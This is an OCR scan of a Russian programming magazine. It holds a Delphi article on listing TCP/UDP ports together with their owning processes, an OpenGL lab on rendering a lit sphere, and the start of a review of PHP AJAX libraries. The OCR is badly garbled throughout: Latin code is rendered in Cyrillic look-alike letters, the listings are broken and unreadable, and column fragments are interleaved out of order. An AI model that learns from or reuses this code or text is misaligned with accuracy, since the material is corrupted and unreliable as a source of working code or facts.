Порты ІЮР не имеют соединений, поэтому их 
таблица состояний немного отличается. 

□ Стру кту р ы дани ых 

Теперь поговорим о структурах данных, через 
которые мы будем получать результирующие 
таблицы. Начнем с ТСР-портов. Функция 
принимает в качестве первого параметра тип 
данных РМІВ_ТСРЕХТАВЕЕ, а, на самом деле, 
это структура следующего вида: 



РМІВ_ТСРЕХТАВЬЕ = Л ТМІВ_ТСРЕХТАВБЕ ; 
ТМІВ_ТСРЕХТАВЬЕ = раскесі. гесогсі. 
сІмЫитЕпк г і е з : ВЖЖВ ; 

ТаЫе: аггау [0..0] оТ 
ТМІВ_ТСРЕХКОѴ7; 

епсі; 



В ней содержится всего два параметра: коли- 
чество элементов в таблице и массив элемен- 
тов таблицы состояний портов. Каждый элемент 
массива — это тоже структура типа 
ТМІВ_ТСРЕХРОѴѴ, представляющая собой вот что: 

РМІВ_ТСРЕХКОМ = Л ТМІ В_ТС РЕХКОШ ; 

ТМІВ_ТСРЕХК(Ж = раскесі гесогсі 
скл/8 к а к е : ВШКВ ; 
сІмЬосаІАсІсІг : ВШКВ; 

(ТШосаІРогС : ВШКВ; 

<Ттд/КетоВеАіЗсІг : БШКВ; 
йѵУКетокеРогк : БШКВ; 
скл/РгосеззІВ : ВШКВ; 

епсі; 

Еспиты не пропустил прошлый номер, то должен 
знать, что функция ѲеЕГсрТаЫе возвращает 
примерно такую же структуру. Здесь также 
присутствует локальный адрес, локальный порт, 
удаленный адрес и удаленный порт. Самое 
последнее поле является новым и определяет 
идентификатор процесса, который открыл порт. 
Теперь посмотрим на структуру РМІВ_ІІ О РЕХТАВ БЕ, 
которая передается в качестве первого парамет- 
ра функции получения состояний ІЮР-портов: 

РМІВ_ББРЕХТАВБЕ = Л ТМІВ_ББРЕХТАВЬЕ ; 

ТМІВ_ББРЕХТАВБЕ = раскесі. гесогсі. 
(ІШитЕпк г і е з : БШКВ ; 

ТаЫе: аггау [0..0] 

ТМ I В_ББ Р ЕХКСЖ ; 

епсі; 

Тут снова нас ожидает количество элементов 
в таблице состояний и массив из структуртипа 
ТМІВ_ІЮРЕХРОѴѴ. Эта структура выглядиттак: 
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А . ТаЫе [I] . 
бѵЫетобеРогб) ) ; 

ЗиЫбешз . 

Абб (ТСРЗбабе 
[ТСРЕхТаЫе А . 

ТаЫе [I] . 
бѵбЗбабе] ) ; 

епб; 
епб; 

/ / Определяем таблицу состояний БРХ- 
портов 

і_б АІІосабеАпбСебБбрЕхТаЫеЕ 
готЗбаск (©БбрЕхТаЫе, Еаізе, 
СебРгосеззНеар , 2, 2) = Ш_ЕККОК 

бЪеп 

Ъедіп 

бог і : = 0 б о ШРЕхТаЫе. 
бѵЫшпЕпбгіез — 1 бс 
Ъедіп 

мібЪ Іѵ/ТСР . Ібешз . Абб бс 
Ъедіп 

Сарбіоп : = ' ЦБР ' ; 

б (ЪЗпарзЪоб = ІШ/АЬ I Б_НАБББЕ_ 
ѴАШЕ ) бЪеп 

//Если не удалось получить снимок, 
то имя процесса оставить пустым 
ЗиЫбешз . Абб ( ' ' ) 
еізе 

//Снимок процессов был получен 
удачно, поэтому переводим ІБ в чело- 
веческое имя 

ЗиЫбешз. Абб ( РгосеззРібТоБате 
(ЪЗпарзЪоб, ГОРЕхТаЫе .ТаЫе [і ] . 
бѵ^РгосеззІб) ) ; 



РМ1В_ЦБРЕХПОШ = А ТМІВ_ШРЕХКОМ; 
ТМІВ_ББРЕХКСЖ = раскеб гесогб 
бтдЬосаІАббг : БМОЕБ; 
бЫюсаІРогб : БШОКБ; 
бчл/РгосеззІБ : БЖЖБ; 
епб; 

В ней мы видим локальный адрес, локальный 
порт и идентификатор процесса. Информации 
об удаленной машине нети быть не может. 

О Вспомогательные функции 

Для реализации примера нам понадобятся 
ещетри системные функции из оконного ядра 
кегпе132.бІІ: 

СгеабеТоо1Ъе1р323парзЪоб : бипсбіоп 
(бмЕІадз, бЪ32РгосеззІБ: БЖЖБ) : 
ТНапбІе ; зббсаіі; 

{$ЕХТЕКБАБЗУМ СгеабеТоо1Ъе1р323па 
рзЪоб } 

Ргосезз32Еігзб : бипсбіоп 
(ЪЗпарзЪоб: ТНапбІе; ѵаг Ірре : 
ТРгосеззЕпбгу32 ) : ВООБ; ; 

{$ЕХТЕКБАБЗУМ РгосеззЗ 2Еігзб } 

Ргосезз32Бехб : іипсі іоп 
(ЪЗпарзЪоб: ТНапбІе; ѵаг Ірре: 
ТРгосеззЕпбгу32 ) : ВООБ; зббсаіі; 
{$ЕХТЕШАБЗУМ Ргосезз32Цехб } 




Листинг 1 

:е ТЕоггпІ . СебЕхСоппесбіопз ; 

ѵаг 

ТСРЕхТаЫе : РМІВ_ТСРЕХТАВБЕ; 
ББРЕхТаЫе: РМІВ_ББРЕХТАВЬЕ ; 
ЪЗпарзЪоб: ТНапбІе; 

і: Іпбедег; 

1оса1_паше : аггау [ 0 . . 2 5 5 ] о б сЪаг ; 
ЕхеБ аше : 3 б г і п д ; 

Ъедіп 

Іѵ/ТСР . Ібешз . ВедіпБрбабе ; 

ІѵіТСР . Ібешз . Сіеаг ; 

/ /Получаем снимок процессов 
ЪЗпарзЪоб : = 

СгеабеТоо1Ъе1р323парзЪоб ($2, 0) ; 

/ / Определяем таблицу состояний ТСР- 
портов 

16 АІІосабеАпбСебТсрЕхТаЫеЕ 
гошЗбаск (©ТСРЕхТаЫе, Еаізе, 
ОебРгосеззНеар , 2, 2) = Ш_ЕККОК 
бЪеп 
Ъедіп 

)г і : = 0 бо ТСРЕхТаЫе. 
бѵббшпЕпбгіез — 1 бс 
Ъедіп 

ЫбЪ ЫТСР . Ібешз . Абб бо 

Ъедіп 

Сарбіоп : = ' ТСР * ; 

б (ЪЗпарзЪоб = I Ш/АЬ I Б_Н АББ Ь Е_ 
ѴАЬБЕ) бЪеп 

//Если не удалось получить снимок, 

то имя процесса оставить пустым 

ЗиЫбешз .Абб ( ' ' ) 

еізе 

Ъедіп 

//Снимок процессов был получен удач- 
но, поэтому переводим ІБ в челове- 
ческое имя 

ЕхеБаше : =РгосеззРібТоБаше 
(ЪЗпарзЪоб, бсрЕхТаЫе. ТаЫе [і] . 
бѵбРгосеззІб) ; 

ЗиЫбешз. Абб (ЕхеБаше) ; 
епб; 

ЗиЫбешз . Абб ( іпеб_пбоа ( 

ТІпАббг (ТСРЕхТаЫе А . ТаЫе [I] . 
бѵЖосаІАббг) ) ) ; 

ЗиЫбешз .Абб ( ІпбТоЗбг (ТСРЕхТаЫе А . 
ТаЫе[І] . бѵ/ЬосаІРогб ) ) ; 

ЗиЫбешз .Абб ( іпеб_пбоа (ТІпАббг 
( ТСРЕхТаЫе А .ТаЫе [I] . 
бѵЖетобеАббг) ) ) ; 

ЗиЫбешз .Абб ( ІпбТоЗбг (ТСРЕхТаЫе 



дебЪозбпаше (1оса1_паше, 255) ; 
ЗиЫбешз . Абб ( іпеб_пбоа (ТІпАббг 
(ББРЕхТаЫе А . ТаЫе [I] . 
бѵЫюсаІАббг) ) ) ; 

ЗиЫбешз. Абб (ІпбТоЗбг 

(ББРЕхТаЫе А .ТаЫе [I]. 

бѵЖосаІРогб) ) ; 

епб ; 

епб; 

епб; 

біпаііу 

Іѵ^ТСР . Ібешз . ЕпбБрбабе ; 




Давай кратко пробежимся по э 
ТИМ функциям: 

СгеаіеТооІЬеІр325пар5Иоі — создает 
снимокуказанного процесса; 

Ргосев532РІГ5і — возвращает первый процесс 
из снимка; 

Ргосе5в32Мех1; — возвращает следующий про- 
цесс из снимка. 

За более подробной 

информацией по этим функциям обращайся 
к М50Ы. 

У них достаточно много возможностей и различ- 
ных флагов, поэтому описать их в одной статье 
будет сложно. 
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> Функция АІІосаІеАпсіЗеІТсрЕхТаЫеРготЗіаск документирована и очень подробно. 
Нужно только уметь искать 



□ Загрузка функций 

Мы объявили переменные, через которые будем 
обращаться к системным функциям, но все 
они являются указателями и на данном этапе 
указывают в никуда. Теперь в них необходимо 
записать соответствующие адреса. В про- 
шлый раз для этого мы создавали функцию 
І_оасІАРІНеІрАРІ. Давай расширим ее и добавим 
следующие строки: 

©АІІосакеАпсІСекТсрЕхТаЪІеРготЗкаск 
: =СекРгосАскІгезз (НІрНІрАрі, ’АІІос 

Аистинг2 

ТипсСіоп ТРоггпІ . РгосеззРі РТоИате 
(кРгосезз: ТНапсІІе; РгосІБ: БЖЖ Б) : 

ѵаг 

ргосЕпкгу : ТРКОСЕЗЗЕИТКУЗ 2 ; 
РгосеззЫате: Зкгіпд; 

Ьедіп 

ргосРпДгу .йкгРіге: =зігеоТ (ргосЕпкгу) ; 
РгосеззЫаше :='???'; 
іі ( Ргосезз32Рігзк (ЬРгосезз, 
ргосЕпкгу) ) Скеп Ьедіп гереаі 
//Рели текущий процесс равен иско- 
мому, то возвращаем его имя 
ІТ (ргосРпЬгу. ЬЬ32РгосеззІВ = 
Ргосісі) РЬеп Ьедіп 

РгосеззЫаше : =ргосРпЬгу . згРхеРіІе; 
ЕезиІС : =РгосеззНате ; 

ехіЪ; епсі; 

ипЬіі (поЬ Ргосезз32ЫехЬ (ЬРгосезз, 
&ргосРпЬгу) ) ; 



КезиІС : =РгосеззЫате ; 



аЬеАпЬСеЬТсрРхТаЫеРготЗЬаск ' ) ; 
©АІІосаЬеАпсЗСеЫЗсірРхТаЫеРготЗЬаск 
: =СеЬРгосАЬсігезз (НІрНІрАрі, ’АІІос 
аЬеАпЬСеЫІсірЕхТаЫеРготЗЬаск ' ) ; 
@СгеаЬеТоо1Ье1р323парз]зоЬ : = 
СекРгосАсМгезз (СеЬМоЬи1еНапЫе 
( ' кегпе132 . сЗ.11 ' ) , ' СгеаЬеТооІЬеІрЗ 
23парзЬоЬ 1 ) ; 

@Ргосезз32Рігзк : = СекРгосАсМгезз 
(СеЬМосіиІеНапЫе ( 1 кегпе132 . Ы1 ' ) , 

' Ргосезз32РігзЬ ' ) ; 

@Ргосезз32Ыехк : = СекРгосАскІгезз 
(СекМосІиІеНапсІІе ( 1 кегпе132 . Ы1 ' ) , 

' Ргосезз32ЫехЬ ' ) ; 

Теперь, после загрузки, каждая переменная 
укажет на соответствующую функцию в системе. 
Если какая-то функция не будет найдена, то 
соответствующая переменная будет равна нулю. 
Эту особенность мы используем для того, чтобы 
определить, поддерживаетли ОС новые функ- 
ции или необходимо применить универсальный 
код, который мы рассматривали в прошлый раз. 

□ Реализация 

Вот мы и подошли к самому интересному — ре- 
ализации универсального примера. В нашем 
старом коде по событию ОпЭЬоѵѵ вызывалась 
функция беіСоппесііопз, в которой и происхо- 
дило определение состояний портов. Улучшим 
пример, поставивусловие вместо безусловного 
вызова: 

ргосеЬиге ТРогтІ . РогтРНслл/ (Зепсіег: 
ТОЬ^есЬ) ; 

Ьедіп 

іі ©АІІосаЬеАпЬСеЬТсрРхТаЫеРго 
шЗЬаск=пі! ЬЬеп 



еізе 

СеЬРхСоппесЬіопз ; 

епсі; 

Если указатель АНосаіеАпббеіТсрЕхТаЫеЕго 
гпЭіаск равен нулю, значит, соответствующей 
функции нет в системе и нужно вызывать 
ОеіСоппесііопз. 

Если он не равен нулю, то функция найдена 
в системе и можно использовать расши- 
ренные функции, которые мы рассмотрели 
сегодня. Полный код содержится в функции 
беіЕхСоппесііопз, которую мы поместили 
в листинге 1 . 

Логика беіЕхСоппесііопз практически не из- 
менилась, по сравнению с ранее написанной 
беіСоппесііопБ. 

Мы точно также получаем таблицу состояний 
и выводим ее содержимое, просто пользуясь 
при этом другими АРІ- функциями. 
Единственное, что заслуживает отде- 
льного внимания, — это вызов функции 
РгосеззРібТоМате, которая должна перево- 
дить идентификатор процесса в удобочитае- 
мое имя. Эту функцию с подробнейшими ком- 
ментариями ты можешь увидеть в листинге 2. 

□ Итог 

Программа готова. На ОѴОты найдешь полно- 
ценную программку, которая определяет порты 
и делает это универсально. 

Если система поддерживает расширенные 
функции, то она использует их и отображает 
имена процессов. Если нет, то ничего страш- 
ного, никакой ошибки не произойдет— прога 
просто воспользуется старыми функциями 
и отобразит все то же самое, исключая имя 
процесса. 

Как видишь, все гениальное — в простоте 
и умении искать нужные функции. Можешь 
улучшить этот пример, чтобы он обновлял 
табл и цу по таймеру и подсвечивал записи, 
состояние портов которых изменилось, или 
новыезаписи в таблице. Можно добавить 
возможность уничтожения выделенного 
процесса, ведь соответствующий иденти- 
фикатор мы научились определять. Только 
не забывай, что при использовании старых 
функций процесс не определен. Кстати, на- 
писанный пример получаеттолько состоя- 
ние ІР-портов старой версии, а реализацию 
состояния I Рѵб легко организовать простым 
изменением последнего флага при вызове 
функций АИоса1;еАпбѲе1:ТсрЕхТаЫеЕгопп5і:аск 
и АиосаіеАпбѲеШбрЕхТаЫеЕгоппЭіаск. 

На этом спешу откланяться. До новых встреч! 30 
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МИХАИЛ ФЛЕНОВ 



СОЗДАНИЕ ИЗОБРАЖЕНИИ С ИСПОЛЬЗОВАНИЕМ 
БИБЛИОТЕКИ 0РЕЫ6І. 



^ согііпд 



Задание: аппроксимировать заданную поверхность полигональной сеткой и средствами 
ОрепбЬобеспечитьдля нее возможность 

а) изображения в параллельной и перспективной проекции, 

б) удаления невидимых линий и поверхностей, 

в) реалистичного освещения, 

г) каркасного изображения, 

д) пространственныхаффинных преобразований. 

Исходные данные, определяющие поверхность, должны считываться изтекстового 
файла. Формат представления исходных данных разрабатывается студентами самостоятельно 
В зависимости от номера студента в группе предоставляются на выбор следующие 
поверхности: сфера с вырезами, конусе вырезами, цилиндр с вырезами и т.д. 



Сегодня в самом первом выпуске нашего революционного Х-проекта :) мы рассмот- 
рим лабу, которую задают на третьем курсе факультета прикладной математики 
в МАИ, (спецкурс «Компьютерная гра фика») . Я немного усложнил задание, так что 
читай — будет интересно. 



Г 4 : 



□Усложняем 

Что та кое «аппроксимировать поверхность»? 
Если посмотреть на фигуры, которые нам 
предлагают, то видно, что все они имеют форму 
с изгибами. Невозможно создать в компьютер- 
ной графике сферу, можнотолько рисоватьточки 
и линии, а окружности создаются с помощью 
большого количества линий (трехмерные 
объекты — изтреугольников). Чем больше 
линий, тем более округлой будет получаться 
форма объекта. Аппроксимировать означает 
создать объект, максимально приближенный 
к реальному. А насколько приближенным его 
нужно сделать в этом задании? Ладно, выберем 



степень соответствия на свое усмотрение. 
Данные необходимо загружать из 
файла, но это же серьезное упущение! Отоб- 
ражение должно происходить полигональным 
методом, поэтому какая разница, какиеданные 
в файле — сфера, цилиндр или пышныеформы 
Памелы Андерсон? Достаточно одному студенту 
выполнитьзадание, а все остальные должны 
только чуть изменитьформат файла и переменные 
в исходнике, чтобы идентичность кода не броса- 
лась в глаза. После этого нужно создать необходи- 
мую фигуру в 305 Мах, сохранитьеев файле, и мож- 
но считать, что задание выполнено. Мыусложним 
задачу и будем генерить фи гуру программно. 



□ Инициализация 

Итак, давай напишем программку, которая 
будетдинамически формировать сферу. Для на- 
чала создадим пустое ѴѴІп32-приложение 
и сразуже добавим необходимыезаголовочные 
файлы, а именно: 

#іпс1исіе <д1\д1.Ъ> 

#іпс1ис!е <таД]т.]т> 

Первый заголовочный файл подключает фун- 
кции ОрепбЦ которые нам предстоит исполь- 
зовать для отображения сферы. Вторая строка 
подключает математические функции. 
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> Сфера сзакрашенными полигонами 



> Каркас сферы 



Так как сфера будет генериться, нам понадо- 
бятсятригонометрические функции из таіЬ. 

И. Теперь идем в Свойства проекта и в Установ- 
ках линкера в строке АсИШопаІ БерепсІепсіез 
добавляем библиотеку орепд132.1ІЬ. Библиотеку 
расширенных функций діи мы использовать 
не будем (да, она упростила бы создание 
сферы, цилиндра и т.д., но, судя по заданию, мы 
не имеем права обращаться к ней). 

Из глобальных переменных нам понадобится 
Иге типа Н6БРС, в которой мы будем сохранять 
контекст рисования ОрепбБ. 

Теперь движемся в функцию ІпШпзІапсе, где 
создается окно. После его создания добавляем 
код из листинга 1 . Я думаю, стоит рассмотреть 
этотлистинг поподробнее, поскольку его пони- 
мание необходимо для выполнения задания. 
После получения контекста рисования окна, мы 
должны задать формат пикселя. В данном 
случае я использую ПбВА-формат в 24 бита. 
Помимо этого, для повышения скорости 
включается двойная буферизация (флаг 
РРВ_В0Е1ВЕЕВБ1РРЕР). В исходнике, который 
ты найдешь на БУБ, задание формата пикселя 
я вынес в отдельную функцию ЭеіРіхеІРогтаБ 
Далее идет создание контекста рисования 
ОрепѲБс помощью функции ѵѵдІСгеаІеСопіехі (он 
будет «текущим» — ѵѵдІМакеСиггепі). Это стан- 
дартная операция при инициализации ОрепбБ. 
Теперьсамое интересное. В задании 
определена необходимость удаления 
невидимых линий и поверхностей. Но как 
это сделать? В ОрепѲБдля этого нужно 
всего лишь включить тест глубины. Без него 
выводится все подряд, и объекты, находящи- 
еся дальше, могут оказаться в одной позиции 
с более близкими объектами. Чтобы включить 
тест глубины, пишем: 

дІЕпаЫе (СЬ_БЕРТН_ТЕЗТ) ; 

Существует множество вариантов тестов 
глубины. Их можно задать с помощью фун- 
кции дЮеріЬРипс. В этом примере я задействую 
тест ѲІ__І_Е55, который используется 



по умолчанию. Про все остальные их виды 
ты можешьузнать из файла справки по функции 
дЮерШРипс. 

□ Освещение 

Освещение — это отдельная история. Согласно 
заданию, мы должны обеспечить реалистичное 
освещение. Но какэто сделать? Реалистичное 
освещение — это целая наука, для него сущес- 
твует великое множество алгоритмов и мето- 
дов (ОрепбБ в этом плане может практически 
все. Самое реалистичное, на мой взгляд, осве- 
щение можно получить только с использовани- 
ем вершинных шейдеров. Но я надеюсь, что со- 
ставители задания не пошли так далеко в своих 
запросах и не испортили нам всюжизнь, и по- 
этому использую освещение, предоставляемое 
функциями ОрепбБ. 

Итак, чтобы в нашей сцене появился источник 
освещения, необходимо его создать, выбрать 
модель и указать его положение. В ОрепѲБ пер- 
вый пун кт достаточно прост, поскольку нам уже 
доступны источники с именами 6Б_БІ6НТі, где 
і изменяется от 0 до 0Б_МАХ_БІѲНТ5. В моем 
заголовочном файле эта константа равна 
0x0031 . Я думаю, этого будет вполне 
достаточно. Мы будем использовать один 
источник освещения — 6Б_БІ6НТ0. Чтобы 
задать его положение, используем следу- 
ющий КОД: 

СЫІоаС розібіоп [ ] = 

{0.0, 1, -1.5, 0.0}; 

дІЬідІіССѵ (СЬ_ЫСНТ0 , СЬ_ 

Р08ІТІ0М, розіСіоп) ; 

В первой строке мы задаем массив из четы- 
рех чисел типа ОББоар которые определят 
позицию источника освещения в нашем 
мире. Во второй — вызываем функцию 
д ІБідЫбѵ, которая имеетЗ параметра: 

1. источникосвещения; 

2. параметр, который нужно изменить; мы 
будем устанавливать позицию света, поэтому 
указываем константу ѲБ РОБІТІОЫ ; 



3. вектор (массив из четырехзначений), задаю- 
щий позицию. 

Эта позиция будеттрансформирована в матри- 
цу тосіеіѵіеѵѵ нашего мира. 

Если не задать положение источника света, то 
по умолчанию будет использоваться вектор 
(0,0,1 ,0). Можно еще задать тип лампочки — рас- 
сеянный свет, прожектор и т.д., но это уже дело 
вкуса и цвета. В задании тип света не указан. 
Итак, позицию лампочки мы задали, теперь 
необходимо включить свет. 

Нет, для этого не нужно вызывать электрика- 
алкаша, нужно просто написать две следую- 
щие строки: 



Аистинг2 

сазе Ѵ\7М_ЗІ2Е : 

// Определяем размеры окна 
К.ЕСТ г; 

ОеШіпйонКесС (Шпб, &г) ; 
чл/ісІСЬ. = г . гідЬС-г . ІеІС ; 
йеідЬС = г .ЪоССот-г . Сор; 

// Использовать матрицу Рг^есСіоп 
дІМаСгіхМобе (СЬ_РК(ХТЕСТІ(Ж) ; 

// Загрузить единичную матрицу 
преобразований 
дІЬоасІІсІепСіСу ( ) ; 

//В зависимости от размеров окна 
создаем параллельную проекцию 
:і: (ѵ^ібЫт <= ИеідЬС) 
дІОгССю (-2, 2, -2 *1теідйС/ѵ\/ісІСЪ. , 

2 *1теід]тС/ѵ\/ісІСЪ. , 2.0, -2.0); 

дІОгССю ( -2*ѵ7ІсІСЪ./Ъ.еід]іС , 

2 *ъ/ісіС]т/]теід]тС , -2, 2, 2.0, -2.0); 

// Задаем область просмотра 
дІѴіеѵтрогС ( 0 , 0, ѵ^ібСЬ, ЬеідІіС) ; 
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дІЕпаЫе (СЬ_ЫСНТШС) ; 
дІЕпаЫе (СЬ_ЫСНТ 0 ) ; 

В первой строке мы разрешаем освещение 
в целом, а во второй — включаем источник 

бі__иенто. 

□ Пости нетал л 

Чтобы освещение работало нормально, жела- 
тельно включить нормализацию: 

дІЕпаЫе (СЬ_ШКМАЫ ЕЕ) ; 
дІЕпаЫе (СЬ_АБТО_ШКМАЬ) ; 

Несмотря на то что при построении сферы я буду 
рассчитывать нормаль ручками, эти 2 флага 
включены, чтобыты знал об их существовании. 
Первый флаг разрешает нормализацию, а вто- 
рой — разрешает это делать автоматом. 

По заданию необходимо предоставить возмож- 
ность отображения фигуры в виде каркаса. Как 
это сделать? Очень просто. Наш полигон будет 
строиться иззакрашенныхтреугольников. 

Чтобы убрать закраску, можно добавить 
следующую строку: 

дІРоІудопМобе ( СЬ_ЕК(ЖТ_АКБ_ 

ВАСК, СЬ_ЫЫЕ) ; 

Здесь мы включаем отображение пере- 
дних и задних поверхностей полигона 
линиями. Теперьэто не закрашенные 
треугольники, а линии, а значит, Орепбб 
нарисуеттолько каркас. 

□ Проекция 

В задании есть пункт, который требует от нас 
обеспечить возможность отображения 
в параллельной и перспективной 
проекции. Для начала определимся, 
что же это такое — параллельная и пер- 
спективная проекция. При параллельной 
проекции все объекты проецируются на 
плоскость просмотра параллельно, без 
каких-либо искажений. Однако наши глаза 
не обладаюттакой широтой обзора, поэ- 
тому нам присуще перспективное зрение 
и такая проекция воспринимается какболее 
естественная. 

Для работы с параллельной проекцией исполь- 
зуется функция дЮгіЬо: 

ѵоіб дІОгЬЪо (СЬбоиЫе ІебЬ, 

СЬбоиЫе гідЪЬ , СЬбоиЫе 
ЪоЬЬот, СЬбоиЫе Дор, СЬбоиЫе 
пеаг, СЬсІоиЫе баг) 
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> Создание сферы с помощью линий. Слева — сфера из малого количества линий, поэтому 
она угловатая. Справа линий в 4 раза больше, поэтому этот объект и на сферу похож больше 



Уже по названиям переменных можно понять, 
что первые четыре задают прямоугольник 
просмотра, а последние две — расстояние 
до ближней и дальней плоскостей отсечения 
соответственно. Все, что ближе пеаг и дальше 
баг, отображаться не будет. 

Чтобы задать перспективную проекцию, нужно 
использовать функцию дІиРегзресбѵе: 

Листинг 1 

// Определяем контекст рисования 
окна 

НБС бс = СебВС(ЪМпб) ; 

// Задаем формат пикселя 

збабіе РІХЕЬЕОКМАТБЕЗСКІРТОК рбб = { 

зігеоб ( РІХЕЬЕОЕМАТБЕЗСКІРТОК) , 

1, РРБ_БКАѴЫГО_ШЫБОѴ\Г | 
РРБ_ЗЬРРОКТ_ОРЕЫСЬ | РЕБ_ 
ВОБВЬЕВБЕЕЕК. , РЕБ_ТМРЕ_КСВА , 

24, О, О, О, О, О, О, О, О, О, 

О, 0, 0, 0, 32, О, О, 

РЕБ_МАШ_РЬАМЕ , 0 , 0 , 0 , 0 } ; 

/ / Выбираем созданный формат 
ріхеІЕогтаб = : : 
СЬоозеРіхеІЕогшаЬ (бс , &рбб) ; 
(ріхеІЕогшаЬ == 0) { 

МеззадеВох ( 0 , 

" СЬоозеРіхеІЕогшаЬ еггог" , 

" Еггог" , МВ_ОК ) ; 
геСигп ЕАЬЗЕ ; 

} 

// Установить формат пикселя 
( : : ЗеЬРіхеІЕогшаЬ (бс , 
ріхеІРогтаЬ , &рбб) == ЕАЬЗЕ) 

{ 

МеззадеВох ( 0 , 

" ЗеЬРіхеІРогтаЬ еггог", 
"Еггог" , МВ_ОК ) ; 
геЬигп ЕАЬЗЕ; 

} 



ѵоіб дІиРегзресЬіѵе (СЬбоиЫе 
апдіеу, СЬбоиЫе азресЬ , СЬбоиЫе 
гпеаг, СЬбоиЫе гбаг) 

Первый параметр — это угол обзора по оси У. 
Второй параметр — соотношение 
сторон, в большинстве случаев его делают рав- 
ным отношению ширины окна к высоте. Далее 

// Создаем контекст ОрепСЬ 
Ъхс = мдІСгеаЬеСопЬехЬ (бс) ; 
мдІМакеСиггепЬ (бс, Ъхс) ; 

/ / Позиция источника освещения и 
позиция просмотра 
СЬбІоаЬ розібіоп [ ] = 

{ 0.0, 1, -1.5, 0.0 } ; 

СЫІоаЬ ІосаЫѵіем [ ] = { 0.0 }; 

/ / Включаем тест глубины 
дІЕпаЫе (СЬ_БЕРТН_ТЕЗТ) ; 
дІБерЬЪЕипс (СЬ_ЬЕЗЗ) ; 

// Включаем освещение 
дІЬідЪЫѵ (СЬ_ЫСНТ0 , СЬ_РОЗІТІОЫ, 
розіЬіоп) ; 
дІЬідЪЬМобеІбѵ ( 
СЬ_ЫСНТ_МОБЕЬ_ЬОСАЬ_ѴІЕТДЕВ , 
1оса1_ѵіеѵ^) ; 
дІЕпаЫе (СЬ_ЬІСНТІЬГС) ; 
дІЕпаЫе (СЬ_ЫСНТ0 ) ; 

/ / Включаем нормализацию 
дІЕпаЫе ( СЬ_АБТО_ШЕМАЬ ) ; 
дІЕпаЫе (СЬ_ШРМАЫ ЕЕ) ; 

/* Раскомментировать следующую 
строку, чтобы отображать в каркас- 
ном виде */ 

/ /дІРоІудопМобе ( СЬ_ЕКОЫТ_АМБ_ 

ВАСК, СЬ_ЫЫЕ) ; 

МоѵеШіпбом (ЪШпб, 10, 10, 640, 480, 
ТКБЕ) 
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идут расстояния до ближней и дальней плоскостей отсечения. 
Вполне логично будет задавать параметры проекции по событию 
изменения размеров окна, ведь от этого зависят и параметры 
отображения. Идем в функцию ѴѴп б Ргос и добавляем туда об- 
работчик события ѴѴМ_5І2Е, код которого можно увидеть в лис- 
тинге 2. В этом примере мы будем использовать параллельное 
проецирование. Чтобы превратить его в перспективу, замени вызов 
дКМЬо следующей строкой: 

дІиРегзресбіѵе ( 45 . 06 , ѵ\/ісі6]і/Ъ.еід]т6 , 1.06, 100.06); 

Эта перспектива будет иметь следующие характеристики: 

1 . Угол обзора в высоту равен 45 градусам. 

2. Соотношение сторон просмотра соответствует соотношению сторон 
окна. 

3. Все вершины/объекты ближе 1 и больше 100 не будут видны. 

Перед установкой необходимой проекции требуется выбрать режим 
матрицы 6І__РП(ХІЕСТІ0М, а после этого загрузить единичную матрицу 
с помощью функции дІІ_оасІІсІепІіІу(]. 

□ Отображение 

Для отображения сцены по событию ѴѴМ_РАІЫТ мы добавим вызов 
функции ОгаѵѵЗсепе (ты найдешь ее на диске). Гигантский размер 
этой функции, обусловленный генерацией в ней сферы матема- 
тическим методом, не позволяет мне привести ее здесь (если 
бы я загружал сферу из файла, то кода получилось бы несколько 
меньше). Впрочем, если ты умеешь работать с файлами, адаптиро- 
вать пример не составиттруда. 

Кстати, в процессе изучения исходника обрати внимание, что 
для каждого треугол ьн и ка я определяю нормали, без кото- 
рых освещение станет невозможным. Просто сформировать 
полигон мало, необходимо нормализовать его, чтобы ОрепѲЕ 
знал, как должен вести себя источник освещения. Поми- 
мо этого, объекту назначается материал. В зависимости от 
материала поверхности изменяется и освещение. Глянцевые 
поверхности должны отбрасывать блики, а матовые — просто 
равномерно рассеивать свет. Размер блика также может отли- 
чаться в зависимости от поверхности. 

Полный код примера ты найдешь на ОУО. Что в нем не хватает? Про- 
странственных преобразований и выреза. Вырез сделать программно 
не такужи сложно, а вот преобразования — достаточно интересная 
тема, и для ее раскрытия нужна отдельная статья. Про 0 і гесбХ- преоб- 
разования я писал в своих книгах «Искусство программирования игр 
на С++» и « 0 і гесб и С++. Искусство программирования». Вторая книга 
имеет варианти для ОеІрЫ. 

□ Зачет! 

Исходный код готового примера — это, конечно, хорошо, но нужно еще 
уметь объяснить этот код (а еще лучше — знать предмет :)). Существует 
множество вариантовтестов глубины, алгоритмов освещений, и, пла- 
вая в этой теме, будь готов к тому, что знающий препод можетлегко пос- 
тавитьтебя в тупик. Так что, если ты прогулял целый семестр и не зна- 
ешь ОрепбЕ, лучше купи книгу и наверстай упущенное. Это необходимо 
не только для сдачи экзаменов, но и просто для себя, ведь мы учимся 
не ради оценок, а ради знаний, без которых после окончания института 
диплом не стоит ничего. 2-И 




КОМИ ЧІШЯ ПркДЛЛГЛЁ Г Д ЛЯ ІЗЛС < ІІ-Д* ЮЩИ I УСЧУІ II 



} хостинг 



ГМ \ хостинг : 
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БОРИС ВОЛЬФСОН 



ТРИ БОГАТЫРЯ 



ОБЗОР АМХ-БИБЛИОТЕК ДЛЯ РНР С ПРАКТИЧЕСКИМИ ПРИМЕРАМИ 



Как известно, писать приложения в идеологии АІАХ сложно по многим причинам, 
начиная довольно трудоемкой отладкой и заканчивая разработкой функций для 
рутинных действий. А зачем это делать заново, ведь есть готовые библиотеки для 
РНР!? В этой статье я расскажу о том, как разрабатывать АЗАХ-приложения, не сходя 
при этом с ума. 



□ Ищем подопытных 

Для этого обзора я выбрал 3 довольно сильно 
различающихся по функционалу библиотеки. 
ПочемутолькоЗ? Дело в том, что другие инте- 
ресные АЗАХ-решения обычно являются частью 
полноценных фрейм ворков для создания 
сайтов, поэтому ихобзорзанял бы слишком 
много места. Стало быть, о них — в следующий 
раз, а пока мы познакомимся с участниками 
сегодняшнего состязания. 

Итак, внимание на сцену! Первым выступает 
представитель легкой весовой категории 
— Заіах; за ним уверенно двигается крепкий 
середнячок — Хаіах; и, наконец, могучий 
тяжеловес, жонглер гирями, способный 
удержать на своей груди платформу с роялем, 
оркестром и взводом королевских мушкете- 
ров, — Ргоіах. 



□ А чтоделать-то будем? 

Сколько «пустых» статей и других материалов об 
АЗАХ и втором поколении веб-технологии пуб- 
ликуются ежедневно? Трудно сосчитать :]. В них 
популярно и доказательно обосновывается, что 
все это очень круто и прогрессивно, но при этом 
авторы забывают рассказать нам одну малость 
